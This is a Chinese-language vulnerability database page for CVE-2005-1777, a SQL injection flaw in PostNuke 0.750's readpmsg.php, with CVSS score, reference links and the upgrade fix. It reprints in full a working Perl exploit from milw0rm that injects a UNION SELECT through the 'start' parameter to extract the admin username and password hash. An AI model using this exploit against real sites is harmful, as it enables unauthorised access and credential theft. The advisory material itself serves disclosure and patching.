CVE-2005-1777
CVSS7.5
发布时间 :2005-05-31 00:00:00
修订时间 :2016-10-17 23:22:29
NMCOE    

[原文]SQL injection vulnerability in readpmsg.php in PostNuke 0.750 allows remote attackers to execute arbitrary SQL commands via the start parameter.


[CNNVD]PostNuke SQL注入漏洞(CNNVD-200505-1239)

        PostNuke 0.750中的readpmsg.php存在SQL注入漏洞,远程攻击者可通过start参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1777
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1777
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1239
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111721364707520&w=2
(UNKNOWN)  BUGTRAQ  20050527 PostNuke Critical SQL Injection and XSS 0.750=>x
http://news.postnuke.com/Article2691.html
(VENDOR_ADVISORY)  CONFIRM  http://news.postnuke.com/Article2691.html
http://securitytracker.com/id?1014066
(UNKNOWN)  SECTRACK  1014066

- 漏洞信息

PostNuke SQL注入漏洞
高危 SQL注入
2005-05-31 00:00:00 2006-04-07 00:00:00
远程  
        PostNuke 0.750中的readpmsg.php存在SQL注入漏洞,远程攻击者可通过start参数执行任意SQL命令。

- 公告与补丁

        

- 漏洞信息 (1030)

PostNuke <= 0.750 readpmsg.php SQL Injection Exploit (EDBID:1030)
php webapps
2005-06-05 Verified
0 K-C0d3r
N/A [点击下载]
#!/usr/bin/perl
# This tools is only for educational purpose
#
# K-C0d3r a x0n3-h4ck friend !!!
#
# This exploit should give admin nick and md5 password
#
#-=[ PostNuke SQL Injection                     version : x=> 0.750]=-
#-=[                                                               ]=-
#-=[ Discovered by sp3x                                            ]=-
#-=[ Coded by K-C0d3r                                              ]=-
#-=[ irc.xoned.net #x0n3-h4ck to find me   K-c0d3r[at]x0n3-h4ck.org]=-
#
# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
#
# !!! NOW IS PUBLIC (6-6-2005) !!!

use IO::Socket;

sub Usage {
print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
exit;
}

if (@ARGV < 2)
{
 Usage();
}

if (@ARGV > 2)
{
 Usage();
}

if (@ARGV == 2)
{
$host = @ARGV[0];
$path = @ARGV[1];

print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
print "[+] Connecting to $host\n";

$injection = "$host\/$path?";
$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";

$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
                                die unless $socket;

print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
 print $_;
 exit;
}
}

# milw0rm.com [2005-06-05]
		

- 漏洞信息

16781
PostNuke Message Module readpmsg.php Start Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

PostNuke contains a flaw that may allow an attacker to inject arbitrary SQL queries. The issue is due to the "start" variable in the " /modules/Messages/readpmsg.php" script not being properly sanitized and may allow an attacker to inject or manipulate SQL queries.

- 时间线

2005-05-20 Unknow
2005-05-27 Unknow

- 解决方案

Upgrade to version 0.750b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站